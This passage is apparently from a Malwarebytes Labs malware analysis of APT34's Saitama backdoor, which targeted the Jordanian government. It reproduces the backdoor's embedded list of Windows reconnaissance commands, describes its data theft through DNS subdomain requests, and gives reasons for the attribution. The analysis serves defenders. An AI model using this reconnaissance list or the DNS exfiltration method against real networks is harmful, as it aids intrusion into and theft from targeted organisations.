ID Type Command1PSGet-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress2PSGet-NetNeighbor -AddressFamily IPv4 | Select-Object “IPADDress”3CMD whoami4PS[System.Environment]::OSVersion.VersionString5CMDnet user6————[NOT USED]———7PSGet-ChildItem -Path “C:\Program Files” | Select-Object Name8PSGet-ChildItem -Path ‘C:\Program Files (x86)’ | Select-Object Name9PSGet-ChildItem -Path ‘C:’ | Select-Object Name10CMDhostname11PSGet-NetTCPConnection | Where-Object {$_.State -eq “Established”} | Select-Object “LocalAddress”, “LocalPort”, “RemoteAddress”, “RemotePort”12PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null13PSnslookup ise-posture.mofagov.gover.local | findstr /i Address;nslookup | findstr /i Address14PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null15PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null16PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null17PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null18PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null19PS$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 ise-posture.mofagov.gover.local | findstr /i ttl) -eq $null20PSGet-NetIPConfiguration | Foreach IPv4DefaultGateway | Select-Object NextHop21PSGet-DnsClientServerAddress -AddressFamily IPv4 | Select-Object SERVERAddresses22CMDsysteminfo | findstr /i \”Domain\”Figure 12: List of predefined commands

It is pretty shocking to see that even when attackers have the possibility of sending any command, they choose to add that predefined list in the backdoor in Base64 format. As we can see, some of them are common reconnaissance snippets, but some of them are not that common. In fact, some of the commands contain internal IPs and also internal domain names (like ise-posture.mofagov.gover.local). That shows that this malware was clearly targeted and also indicates that the actor has some previous knowledge about the internal infrastructure of the victim.


The Send state is used to send the results generated by commands to the actor’s server. In this case, the name of the subdomain will contain the data. As domain names are used to exfiltrate unknown amounts of data, attackers had to split this data in different buffers. Every buffer is then sent through a different DNS request. As it can be seen in the Figure 12, all the required information in order to reconstruct original data is sent to the attackers. The size of the buffer is only sent in the first packet.

Figure 13: Send data to server Attribution

There are several indicators that suggest that this campaign has been operated by APT34.

  • Maldoc similarity: The madoc used in this campaign shared some similarities with maldocs used in previous campaigns of this actor. More specifically similar to what was mentioned in CheckPoint’s report this maldoc registers a scheduled task that would launch the executable every X minutes, also it uses the same anti sandboxing technique (checking if there is a mouse connected to the PC or not). Finally, we see a similar pattern to beacon back to the attacker server and inform the attacker about the current stage of execution.
  • Victims similarity: The group is known to target the government of Jordan and this is the case in this campaign.
  • Payload similarity: DNS is the most common method used by APT34 for its C&C communications. The group is also known to use uncommon encodings such as Base32 and Base36 in its previous campaigns. The Saitama backdoor uses a similar Base32 encoding for sending data to the servers that is used by DNSpionage. Also, to build subdomains it uses Base32 encoding that is similar to what was reported by Mandiant.

Malwarebytes customers are protected from this attack via our Anti-Exploit layer.


Confirmation Receive Document.xls
Saitama backdoor:

The post APT34 targets Jordan Government using new Saitama backdoor appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds